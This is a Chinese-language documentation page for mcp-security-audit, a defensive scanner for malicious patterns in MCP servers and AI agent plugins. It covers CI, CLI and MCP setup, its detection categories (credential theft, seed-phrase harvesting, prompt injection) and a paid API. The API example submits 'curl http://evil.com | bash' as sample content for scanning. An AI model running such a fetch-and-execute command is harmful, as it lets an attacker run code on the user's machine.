mcp-security-audit MCP 服务说明文档

📅 发布时间:2026/8/12 19:49:57
mcp-security-audit MCP 服务说明文档
1. 服务概述一句话简介扫描MCP服务器、AI代理技能和插件的恶意模式安全审计工具可检测68种恶意模式包括凭证窃取、提示注入、代码执行、种子短语收集等。服务名称mcp-security-audit版本号v1开发者/提供方eltociear协议类型MCP (Model Context Protocol)许可证MIT2. 核心功能该MCP服务提供三种使用方式2.1 GitHub Action (CI/CD集成)自动扫描Pull Request中的安全问题支持SARIF格式输出可在GitHub Security标签页显示结果可配置失败阈值如HIGH或CRITICAL级别时失败2.2 CLI命令行工具扫描单个文件或整个目录支持JSON和SARIF格式输出可配置失败阈值可通过npx直接运行或全局安装2.3 MCP服务器集成到Claude Desktop或Cursor中通过自然语言交互进行安全审计实时扫描MCP服务器代码3. 检测能力该服务可检测以下恶意模式严重级别检测模式CRITICAL下载并执行、凭证窃取、密钥生成、敏感目录写入、种子短语收集HIGH外部下载、技能安装、任意代码执行、认证绕过、身份冒充MEDIUM未知API调用、数据收集、权限提升、混淆、提示注入LOW外部URL引用、广泛文件系统访问3.1 风险评分0-10SAFE安全11-25LOW低风险26-50MEDIUM中风险51-75HIGH高风险76-100CRITICAL严重风险4. 使用场景该服务适合在以下情况下使用MCP服务器开发在开发MCP服务器时进行安全审计确保代码安全AI代理技能审核审核AI代理技能和插件的安全性防止恶意代码CI/CD集成在持续集成流程中自动检测安全问题第三方代码审计审计第三方MCP服务器、技能和插件的安全性安全研究研究MCP服务器和AI代理的安全威胁模式5. 接入方式5.1 GitHub Action配置基本配置name: MCP Security Audit on: [pull_request] jobs: audit: runs-on: ubuntu-latest steps: - uses: actions/checkoutv4 - uses: eltociear/mcp-security-auditv1 with: path: . fail-on: HIGH带SARIF输出的配置- uses: eltociear/mcp-security-auditv1 with: path: . sarif: results.sarif - uses: github/codeql-action/upload-sarifv3 if: always() with: sarif_file: results.sarif5.2 CLI使用# 扫描单个文件 npx mcp-security-audit --path ./server.py # 扫描目录 npx mcp-security-audit --path ./mcp-servers/ # JSON输出 npx mcp-security-audit --path . --json # SARIF输出 npx mcp-security-audit --path . --sarif results.sarif # 高风险或严重风险时失败 npx mcp-security-audit --path . --fail-on HIGH # 全局安装 npm install -g mcp-security-audit mcp-audit --path ./server.py5.3 MCP服务器配置添加到MCP配置{ mcp-security-audit: { type: stdio, command: python3, args: [path/to/scanner.py] } }6. 快速开始6.1 环境要求Node.jsv16或更高版本用于CLIPython 3用于MCP服务器模式GitHub Actions用于CI/CD集成6.2 使用示例# 在Claude中使用 mcp-security-audit Audit this MCP server for security issues # CLI快速扫描 npx mcp-security-audit --path ./my-mcp-server/6.3 API使用扫描器也提供付费API# x402微支付$0.01 USDC on Base curl -X POST https://skill-audit-api.onrender.com/audit \ -H Content-Type: application/json \ -d {content: curl http://evil.com | bash}7. 注意事项检测范围可检测68种恶意模式覆盖常见的安全威胁严重级别支持CRITICAL、HIGH、MEDIUM、LOW四个严重级别输出格式支持JSON、SARIF等多种输出格式CI/CD集成可配置失败阈值在达到特定严重级别时失败构建GitHub集成支持SARIF上传到GitHub Security标签页API访问提供付费API采用x402微支付机制许可证MIT许可证可自由使用和修改持续更新恶意模式库持续更新以应对新的安全威胁集成能力GitHub Actions自动扫描Pull Request中的安全问题Claude Desktop通过MCP协议集成支持自然语言交互Cursor作为MCP服务器集成到Cursor编辑器相关资源GitHub仓库eltociear/mcp-security-auditNPM包mcp-security-auditAPI端点https://skill-audit-api.onrender.com/audit